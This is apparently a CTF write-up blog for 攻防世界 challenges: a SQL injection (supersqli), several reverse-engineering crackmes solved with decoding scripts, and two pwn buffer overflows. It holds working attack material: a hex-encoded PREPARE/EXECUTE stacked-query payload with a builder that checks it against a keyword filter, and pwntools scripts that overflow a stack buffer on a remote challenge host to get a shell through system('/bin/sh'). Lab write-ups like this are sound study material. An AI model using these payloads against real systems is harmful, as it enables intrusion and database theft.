
攻防世界 web section

March 1, 2026
No tags

Summary

In the supersqli challenge from 攻防世界's web section, a payload is constructed to get around the select filter: the SQL is handed to a prepared statement and run with EXECUTE to obtain the flag. Other challenges such as logmein, no-strings-attached and getit are solved by decryption and reverse engineering: logmein decrypts with XOR, no-strings-attached with byte arithmetic, getit with a simple encoding. These challenges exercise reverse engineering and encryption/decryption skills.


0x0e supersqli

[screenshots: Untitled.png, Untitled 1.png, Untitled 2.png]

Because select is filtered, first hex-encode select * from `1919810931114514` (the table name starts with a digit, so it needs backticks).
Then build the payload:
;SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#
which returns the flag.
PREPARE ... FROM ... creates a prepared statement from a string. MySQL treats a 0x... literal as a string, so the hex is decoded back into the SQL text inside the server and the filtered keyword never appears in plaintext in the request.
EXECUTE runs the statement created by PREPARE.
A note on SET versus SELECT for assignment: in MySQL, SET can assign several user variables in one statement (SET @a = ..., @b = ...), so that is not why SET is used here. SET is used because it is not in the keyword filter, and the mixed-case SeT is there because, as far as I recall the challenge source, a second check does a case-sensitive search for lowercase set together with prepare.
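To make the bypass concrete, here is an added Python helper (not part of the original write-up) that builds this payload from any SQL statement and checks it against the WAF as I remember it from the challenge source: a case-insensitive keyword regex plus a case-sensitive strstr() for set and prepare. Both filter functions are reconstructed from memory and are assumptions, not quoted from this page; the table name and the resulting payload string are the ones above.

```python
"""Build the supersqli stacked-query payload and check it against the keyword filter offline."""
import re

# The two checks below are how I remember the challenge's WAF (assumption, not quoted from
# the page): a case-insensitive regex on SQL keywords and '.', and a case-sensitive
# substring test for "set" together with "prepare". The page only shows the final payload.
KEYWORD_RE = re.compile(r"select|update|delete|drop|insert|where|\.", re.IGNORECASE)


def hex_literal(sql: str) -> str:
    """MySQL reads 0x... as a binary string, so PREPARE ... FROM @a receives the decoded SQL."""
    return "0x" + sql.encode("latin-1").hex()


def decode_hex_literal(literal: str) -> str:
    """Reverse of hex_literal, handy when reading payloads back out of access logs."""
    if not literal.lower().startswith("0x"):
        raise ValueError("not a hex literal")
    return bytes.fromhex(literal[2:]).decode("latin-1")


def build_payload(sql: str, var: str = "a", stmt: str = "execsql") -> str:
    """';' closes the original query (stacked queries), SeT assigns the hex literal to a
    user variable, PREPARE turns that string into a statement, EXECUTE runs it and '#'
    comments out the rest of the original query. The filtered keyword only ever appears
    inside the hex literal, and SeT is mixed-case to dodge the case-sensitive check."""
    return f";SeT@{var}={hex_literal(sql)};prepare {stmt} from @{var};execute {stmt};#"


def blocked_by_keyword_filter(inject: str) -> bool:
    return KEYWORD_RE.search(inject) is not None


def blocked_by_set_prepare_filter(inject: str) -> bool:
    return "set" in inject and "prepare" in inject


def blocked(inject: str) -> bool:
    """True if either (assumed) WAF check would reject the injected text."""
    return blocked_by_keyword_filter(inject) or blocked_by_set_prepare_filter(inject)


if __name__ == "__main__":
    naive = "1'; select * from `1919810931114514`;#"
    payload = build_payload("select * from `1919810931114514`")
    print("naive injection blocked:", blocked(naive))
    print("prepared-statement payload blocked:", blocked(payload))
    print(payload)
    print("decoded:", decode_hex_literal(payload.split("=")[1].split(";")[0]))
```

Lowercasing the SeT in the generated payload is enough to make the second check fire again, which is a quick way to confirm which of the two filters a given variant is tripping.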

open-source

[image: blog image]
C
#include <stdio.h>
#include <stdlib.h>   /* atoi and exit were used without this include in the listing as posted */
#include <string.h>

int main(int argc, char *argv[]) {
    if (argc != 4) {
        printf("what?\n");
        exit(1);
    }

    /* atoi parses argv[1] as decimal, so it has to be "51966", not "0xcafe" */
    unsigned int first = atoi(argv[1]);
    if (first != 0xcafe) {
        printf("you are wrong, sorry.\n");
        exit(2);
    }

    /* argv[2] must satisfy second % 5 != 3 and second % 17 == 8 */
    unsigned int second = atoi(argv[2]);
    if (second % 5 == 3 || second % 17 != 8) {
        printf("ha, you won't get it!\n");
        exit(3);
    }

    if (strcmp("h4cky0u", argv[3])) {
        printf("so close, dude!\n");
        exit(4);
    }

    printf("Brr wrrr grr\n");

    /* only second % 17 enters the hash, so every accepted argv[2] gives the same key */
    unsigned int hash = first * 31337 + (second % 17) * 11 + strlen(argv[3]) - 1615810207;

    printf("Get your key: ");
    printf("%x\n", hash);
    return 0;
}

atoi (ASCII to integer) parses the argument as a decimal string, so 0xcafe has to be passed as 51966:

./string 51966 25 h4cky0u

Or just compute the key directly:

C
#include <stdio.h>
#include <string.h>

int main(void) {
    /* the original expression with the checked values substituted:
       first = 0xcafe, second % 17 = 8, argv[3] = "h4cky0u" */
    unsigned int hash = 0xcafe * 31337 + 8 * 11 + strlen("h4cky0u") - 1615810207;

    printf("Get your key: ");
    printf("%x\n", hash);

    return 0;
}

[screenshot: Untitled 3.png]
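The same derivation as an added Python script (mine, not from the original post): it enumerates which argv[2] values the two modulo checks accept, which shows why 8 itself is rejected and 25 is the smallest that works, and replays the hash with an explicit 32-bit mask, which is what unsigned int arithmetic in C does. The constants are the ones from the C source above.

```python
"""Derive the open-source key offline: enumerate argv[2] values the checks accept and replay
the C hash expression with unsigned 32-bit wraparound."""

MASK32 = 0xFFFFFFFF
FIRST = 0xCAFE          # atoi(argv[1]) == 0xcafe, so argv[1] must be the decimal "51966"
THIRD = "h4cky0u"       # strcmp("h4cky0u", argv[3]) == 0


def second_ok(second: int) -> bool:
    """Mirror of: if (second % 5 == 3 || second % 17 != 8) reject."""
    return not (second % 5 == 3 or second % 17 != 8)


def valid_seconds(limit: int) -> list:
    """All accepted argv[2] values below limit. 8 fails because 8 % 5 == 3; 25 is the first."""
    return [s for s in range(limit) if second_ok(s)]


def key(first: int, second: int, third: str) -> str:
    """unsigned int hash = first*31337 + (second%17)*11 + strlen(third) - 1615810207;
    C evaluates this modulo 2**32, so mask explicitly rather than trusting Python's big ints
    (for the real inputs the value stays positive, but a wrong guess for first may not)."""
    h = (first * 31337 + (second % 17) * 11 + len(third) - 1615810207) & MASK32
    return f"{h:x}"


def solve() -> tuple:
    """The argv to pass and the key the program will print for it."""
    second = valid_seconds(100)[0]
    return [str(FIRST), str(second), THIRD], key(FIRST, second, THIRD)


if __name__ == "__main__":
    argv, k = solve()
    print("./string", *argv)
    print("Get your key:", k)
```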

hello ctf

[screenshots: Untitled 4.png, Untitled 5.png]

simple-unpack


[screenshots: Untitled 6.png, Untitled 7.png]

It's packed.

[screenshots: Untitled 8.png, Untitled 9.png, Untitled 10.png, Untitled 11.png]

logmein


[screenshots: Untitled 12.png, Untitled 13.png, Untitled 14.png, Untitled 15.png]

适量N

[screenshot: Untitled 16.png]
Python
var28 = "harambe"                 # key, 7 bytes, reused cyclically
var20 = ":\"AL_RT^L*.?+6/46"      # encrypted bytes pulled from the binary
flag = ""

for i in range(len(var20)):
    f = ord(var20[i]) ^ ord(var28[i % 7])   # xor each byte with key[i mod 7]
    flag += chr(f)
print(flag)

[screenshot: Untitled 17.png]

no-strings-attached


[screenshots: Untitled 18.png, Untitled 19.png]

Press X to follow the cross-references.

[screenshots: Untitled 20.png, Untitled 21.png]

It needs decrypting.

[screenshots: Untitled 22.png, Untitled 23.png]
Python
# the array is a wchar_t string: 4 bytes per character, only the first byte of each carries the value
buf = [
    0x3a,0x14,0x00,0x00, 0x36,0x14,0x00,0x00, 0x37,0x14,0x00,0x00, 0x3b,0x14,0x00,0x00, 0x80,0x14,0x00,0x00,
    0x7a,0x14,0x00,0x00, 0x71,0x14,0x00,0x00, 0x78,0x14,0x00,0x00, 0x63,0x14,0x00,0x00, 0x66,0x14,0x00,0x00,
    0x73,0x14,0x00,0x00, 0x67,0x14,0x00,0x00, 0x62,0x14,0x00,0x00, 0x65,0x14,0x00,0x00, 0x73,0x14,0x00,0x00,
    0x60,0x14,0x00,0x00, 0x6b,0x14,0x00,0x00, 0x71,0x14,0x00,0x00, 0x78,0x14,0x00,0x00, 0x6a,0x14,0x00,0x00,
    0x73,0x14,0x00,0x00, 0x70,0x14,0x00,0x00, 0x64,0x14,0x00,0x00, 0x78,0x14,0x00,0x00, 0x6e,0x14,0x00,0x00,
    0x70,0x14,0x00,0x00, 0x70,0x14,0x00,0x00, 0x64,0x14,0x00,0x00, 0x70,0x14,0x00,0x00, 0x64,0x14,0x00,0x00,
    0x6e,0x14,0x00,0x00, 0x7b,0x14,0x00,0x00, 0x76,0x14,0x00,0x00, 0x78,0x14,0x00,0x00, 0x6a,0x14,0x00,0x00,
    0x73,0x14,0x00,0x00, 0x7b,0x14,0x00,0x00, 0x80,0x14,0x00,0x00,
]
f = []
for i in range(0, len(buf), 4):    # keep one byte per 4-byte character
    f.append(buf[i])
print(f)
fl = ""
nu = [1, 2, 3, 4, 5]               # the binary added 1..5 cyclically, so subtract them again
for j in range(len(f)):
    fl += chr(f[j] - nu[j % 5])
print(fl)

getit


[screenshots: Untitled 24.png, Untitled 25.png]
Python
s = 'c61b68366edeb7bdce3c6820314b7498'   # the constant the binary mangles
flag = ''
for i in range(len(s)):
    # +1 at odd indices, -1 at even indices undoes the transform
    if i & 1:
        t = 1
    else:
        t = -1
    flag += chr(ord(s[i]) + t)
print(flag)

# result: b70c59275fcfa8aebf2d5911223c6589
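logmein, no-strings-attached and getit are all the same shape: a constant buffer in the binary plus a transform that depends on the byte's position. Here is an added Python decoder (not the original write-up's code) that handles all three with one function, collapses a wchar_t array the way the no-strings-attached script does but with struct instead of a stride-4 loop, and raises if the output is not printable ASCII, which is the quickest way to notice a wrong key or a key index that is off by one. The logmein key and ciphertext, the 38 byte values and the getit constant are taken from the scripts above; the 4-byte dump is rebuilt from those values as a constructed sample.

```python
"""logmein, no-strings-attached and getit all hide the flag as a constant buffer plus a
per-position transform. One decoder with a printable-ASCII check covers all three and
fails loudly when a key or index offset is wrong."""
import struct
from typing import Callable


def decode(data: bytes, transform: Callable[[int, int], int]) -> str:
    """Apply transform(index, byte) to every byte and insist the result is printable ASCII."""
    out = bytes(transform(i, b) & 0xFF for i, b in enumerate(data))
    if not all(0x20 <= b < 0x7F for b in out):
        raise ValueError(f"non-printable result, wrong key or offset? {out!r}")
    return out.decode("ascii")


def narrow(dump: bytes, width: int = 4) -> bytes:
    """Collapse a little-endian wchar_t array (width bytes per character) to one byte per
    character; refuse anything that is not actually a narrow string in disguise."""
    if len(dump) % width:
        raise ValueError("dump length is not a multiple of the character width")
    fmt = {2: "<H", 4: "<I"}[width]
    values = [struct.unpack_from(fmt, dump, i)[0] for i in range(0, len(dump), width)]
    if any(v > 0xFF for v in values):
        raise ValueError("code unit above 0xFF, not a byte string")
    return bytes(values)


# logmein: repeating-key XOR, key and ciphertext as in the write-up above
LOGMEIN_CT = b':"AL_RT^L*.?+6/46'
LOGMEIN_KEY = b"harambe"


def logmein() -> str:
    return decode(LOGMEIN_CT, lambda i, b: b ^ LOGMEIN_KEY[i % len(LOGMEIN_KEY)])


# no-strings-attached: subtract 1,2,3,4,5 cyclically. These are the first bytes of each
# 4-byte element of the array in the write-up; the wchar_t dump is a constructed sample
# rebuilt from them so that narrow() has something to parse.
NSA_VALUES = [
    0x3a, 0x36, 0x37, 0x3b, 0x80, 0x7a, 0x71, 0x78, 0x63, 0x66, 0x73, 0x67, 0x62,
    0x65, 0x73, 0x60, 0x6b, 0x71, 0x78, 0x6a, 0x73, 0x70, 0x64, 0x78, 0x6e, 0x70,
    0x70, 0x64, 0x70, 0x64, 0x6e, 0x7b, 0x76, 0x78, 0x6a, 0x73, 0x7b, 0x80,
]
NSA_DUMP = b"".join(struct.pack("<I", v) for v in NSA_VALUES)


def no_strings_attached() -> str:
    return decode(narrow(NSA_DUMP), lambda i, b: b - (i % 5 + 1))


# getit: +1 at odd indices, -1 at even indices
GETIT_CT = b"c61b68366edeb7bdce3c6820314b7498"


def getit() -> str:
    return decode(GETIT_CT, lambda i, b: b + (1 if i & 1 else -1))


if __name__ == "__main__":
    for name, fn in (("logmein", logmein),
                     ("no-strings-attached", no_strings_attached),
                     ("getit", getit)):
        print(f"{name}: {fn()}")
```

Swapping the subtraction for an addition in no_strings_attached pushes the 0x80 entries past 0x7F, and the printable check catches it immediately instead of printing a flag that looks almost right.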

csaw2013reversing2

[screenshots: Untitled 26.png, Untitled 27.png]

When opening it, you must tick "load in write mode".

[screenshots: Untitled 28.png, Untitled 29.png, Untitled 30.png, Untitled 31.png, Untitled 32.png]

References

[!info] Winny的一亩三分地
I was originally doing Web (though pretty badly), but the team was short of reverse and pwn people, and I happened to be interested in that area too, so I switched direction. Having studied for only a few days, I started with a few of the 攻防世界 beginner training challenges. I'm recording my solving process and what I learned along the way. Since much of the time I solved things by blind trial and error, the notes are split into two parts: the first is [Solving Log], my actual thought process, where the flag may have been guessed with a good deal of luck. The second is [Analysis and Summary], which is what I.
https://winny.work/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E9%80%86%E5%90%91%E6%96%B0%E6%89%8B%E8%AE%AD%E7%BB%83/435.html

EasyRE

Saw something strange.

[screenshot: Untitled 33.png]

It's a decoy.

[screenshot: Untitled 34.png]

Reverse the algorithm.

Got stuck here.

level0

[screenshot: Untitled 35.png]

Nothing much here.


[screenshot: Untitled 36.png]

There's a hint; go into it.

[screenshot: Untitled 37.png]

We can input 0x200 bytes, but buf is only 0x80 bytes long.

[screenshot: Untitled 38.png]
Python
from pwn import *
r = remote("111.200.241.244", 58379)            # challenge server
# 0x80 bytes fill buf, 8 more overwrite the saved rbp (restored by leave),
# then the return address is replaced with the start of callsystem
payload = b'A' * 0x80 + b'a' * 0x8 + p64(0x00400596)
r.recvuntil(b"Hello, World\n")                   # wait for the banner
r.sendline(payload)                              # send the payload
r.interactive()                                  # talk to the shell

[screenshot: Untitled 39.png]

level2


[screenshot: Untitled 40.png]

The vulnerable function comes first.

[screenshots: Untitled 41.png, Untitled 42.png]

The buffer is 0x88 bytes and the read takes 0x100, so it overflows.

Find the system function we want to jump to: 0x08048320

[screenshot: Untitled 43.png]

We need system("/bin/sh"); the string is found at 0x0804a024.

[screenshot: Untitled 44.png]

Build the payload

[screenshot: Untitled 45.png]

payload=b'a'*(0x88+0x4)+p32(0x08048320)+p32(0)+p32(0x0804a024)

[screenshot: Untitled 46.png]
Python
from pwn import *
p = remote('111.200.241.244', 60256)
# variant 1: return onto the 'call system' instruction, which pushes its own return address
# payload = b'a' * (0x88 + 0x4) + p32(0x0804845c) + p32(0x0804a024)
# variant 2: return into system@plt directly; p32(0) is the fake return address system
# sees at [esp], p32(0x0804a024) is its argument, the "/bin/sh" string
payload = b'a' * (0x88 + 0x4) + p32(0x08048320) + p32(0) + p32(0x0804a024)
# p.recvuntil(b"Input:\n")
p.recv()
p.sendline(payload)
p.interactive()

Both approaches work.
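For both level0 and level2, what actually lands on the stack is easier to see without a live target. The following Python (an added example, not the write-up's exploit scripts) builds the three payloads with struct instead of pwntools and then parses each one back into the frame it overwrites: the return address and the words that follow it, which are what the returned-to function sees at [esp]/[rsp]. The buffer sizes and addresses are the ones stated above for those binaries; nothing here talks to the server.

```python
"""Assemble and inspect the stack-overflow payloads from level0 (x86-64) and level2 (i386)."""
import struct

# Addresses as given in the write-up above; they belong to those specific binaries.
LEVEL0_CALLSYSTEM = 0x400596
LEVEL2_SYSTEM_PLT = 0x08048320
LEVEL2_CALL_SYSTEM = 0x0804845C
LEVEL2_BINSH = 0x0804A024


def pack_word(value: int, ptr_size: int) -> bytes:
    """Little-endian word of the target's pointer size (what pwntools p32/p64 produce)."""
    return struct.pack("<I" if ptr_size == 4 else "<Q", value)


def overflow_payload(buf_size: int, ptr_size: int, chain: list) -> bytes:
    """Filler over the buffer and the saved frame pointer, then the words that overwrite the
    return address and the slots above it. buf_size is the distance from the start of the
    buffer to the saved rbp/ebp, which the oversized read() lets us walk past."""
    filler = b"a" * (buf_size + ptr_size)
    return filler + b"".join(pack_word(w, ptr_size) for w in chain)


def frame_view(payload: bytes, buf_size: int, ptr_size: int) -> dict:
    """Parse a payload back into the overwritten frame: the return address, then the words
    the returned-to function finds at [esp]/[rsp] and upward."""
    fmt = "<I" if ptr_size == 4 else "<Q"
    start = buf_size + ptr_size
    end = len(payload) - (len(payload) - start) % ptr_size
    words = [struct.unpack_from(fmt, payload, i)[0] for i in range(start, end, ptr_size)]
    return {"ret": words[0], "after_ret": words[1:]}


def level0_payload() -> bytes:
    # 0x80-byte buffer, 8-byte saved rbp, return into callsystem. No argument is needed,
    # callsystem already runs system("/bin/sh") itself.
    return overflow_payload(0x80, 8, [LEVEL0_CALLSYSTEM])


def level2_payload_plt() -> bytes:
    # Return into system@plt. system then sees a fake return address (0) at [esp] and its
    # argument, the "/bin/sh" pointer, at [esp+4], exactly as if it had been called normally.
    return overflow_payload(0x88, 4, [LEVEL2_SYSTEM_PLT, 0, LEVEL2_BINSH])


def level2_payload_call() -> bytes:
    # Return onto the 'call system' instruction instead: the call pushes the return address
    # itself, so only the argument has to follow.
    return overflow_payload(0x88, 4, [LEVEL2_CALL_SYSTEM, LEVEL2_BINSH])


if __name__ == "__main__":
    for name, pl, bs, ps in (("level0", level0_payload(), 0x80, 8),
                             ("level2 via system@plt", level2_payload_plt(), 0x88, 4),
                             ("level2 via call system", level2_payload_call(), 0x88, 4)):
        v = frame_view(pl, bs, ps)
        after = ", ".join(f"0x{w:x}" for w in v["after_ret"]) or "(nothing)"
        print(f"{name}: {len(pl)} bytes, ret=0x{v['ret']:x}, after ret: {after}")
```

The two level2 variants differ by exactly one word: returning into the PLT stub skips the call instruction, so the payload has to supply the return address that the call would have pushed.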

level3

END
